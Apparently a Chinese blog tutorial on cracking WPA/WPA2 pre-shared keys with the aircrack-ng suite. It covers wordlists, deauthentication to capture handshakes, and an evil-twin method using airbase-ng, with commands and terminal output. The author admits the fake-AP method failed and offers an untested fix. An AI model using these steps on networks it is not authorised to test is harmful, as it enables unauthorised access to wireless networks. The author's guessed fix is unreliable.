WPA 攻击

一、WPA PSK攻击

　　学习资源推荐：http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/

1、破解方法

　　WPA不存在WEP的弱点，只能暴力破解，影响因素：

• CPU资源
• 时间
• 字典质量
• 网上共享的字典
• 泄露密码
• 地区电话号码段
• Crunch生成字典
• kali中自带的字典文件

2、PSK破解过程

• 启动monitor
• 开始抓包并保存
• Deauthentication攻击获取4步握手信息（抓不到包的话打断目前存在的连接）
• 使用字典暴力破解

3、演示

　　如果一直抓不到包时，可用下面命令打断现有连接，在双方自动重新建立连接时可抓到

• kali 常用字典位置

┌──(root💀kali)-[/usr/share/wordlists]
└─# ls
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt  wfuzz

二、无AP情况下的WPA密码破解

• 启动monitor
• 开始抓包并保存
• 根据 probe 信息伪造相同ESSID的AP
• 抓取四步握手中的前两个包
• 使用字典暴力破解

1、原理

 

 

 

　　依据目标探测的AP，我们自己伪造一个ESSID为其名的AP，然后根据WPA认证机制（上图）我们就可以知道ESSID，ANonce，SNonce，MAC1，MAC2，为此我们只有PSK不知道，但是目标会将PMK（PSK+ESSID计算得来），ANonce，SNonce，MAC1，MAC2计算的MIC和SNonce发给伪造的AP，又因相关加密算法是已知的，所以我们可以暴力枚举可能的PSK值，然后计算MIC，与目标发过来的MIC所对比，当一致时则破解成功。

2、破解演示

• 启动monitor

┌──(root💀kali)-[/home/kali]
└─# iwconfig 
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
                                                                                                      
┌──(root💀kali)-[/home/kali]
└─# airmon-ng start wlan0                     

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    530 NetworkManager
   1307 wpa_supplicant

PHY     Interface       Driver          Chipset

phy1    wlan0           rt2800usb       Ralink Technology, Corp. RT5370
                (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
                (mac80211 station mode vif disabled for [phy1]wlan0)

                                                                                                      
┌──(root💀kali)-[/home/kali]
└─# iwconfig 
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

• 伪造AP

 airbase-ng帮助信息

┌──(root💀kali)-[/home/kali]
└─# airbase-ng --help

  Airbase-ng 1.6  - (C) 2008-2020 Thomas d'Otreppe
  Original work: Martin Beck
  https://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows other clients to peer)
      -Y in|out|both   : external packet processing
      -c channel       : sets the channel the AP is running on
      -X               : hidden ESSID
      -s               : force shared key authentication (default: auto)
      -S               : set shared key challenge length (default: 128)
      -L               : Caffe-Latte WEP attack (use if driver can't send frags)
      -N               : cfrag WEP attack (recommended)
      -x nbpps         : number of packets per second (default: 100)
      -y               : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)
      -n hex           : User specified ANonce when doing the 4-way handshake

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen

示例

┌──(root💀kali)-[/home/kali]
└─# airbase-ng --essid zmr -c 6 -Z 4  wlan0mon
03:04:33  Created tap interface at0
03:04:33  Trying to set MTU on at0 to 1500
03:04:34  Access Point with BSSID 1C:BF:CE:3B:5F:BE started.

参数：-c指定信道，-Z代表WPA2加密，4是指定CCMP加密

• 抓包破解

┌──(root💀kali)-[/home/kali]
└─# airodump-ng wlan0mon --essid zmr -w wpa -c 6

　　备注：大体流程如上，细节可能有问题，因为自己实验时并未破解出密码（实际密码在字典中）

• 解决备注问题（个人理解）

　　station应该对真实AP的MAC在本地做了记录，计算MIC时用的MAC其实是真实AP的MAC，也就是说我们伪造的假AP的MAC需要设成真实AP的MAC，这样抓的包才可成功破解，如下(不是同一WiFi实验的，所以MAC和上面有所不同)：

WiFi握手包破解速度提升工具：https://www.cnblogs.com/z9m8r8/articles/16336553.html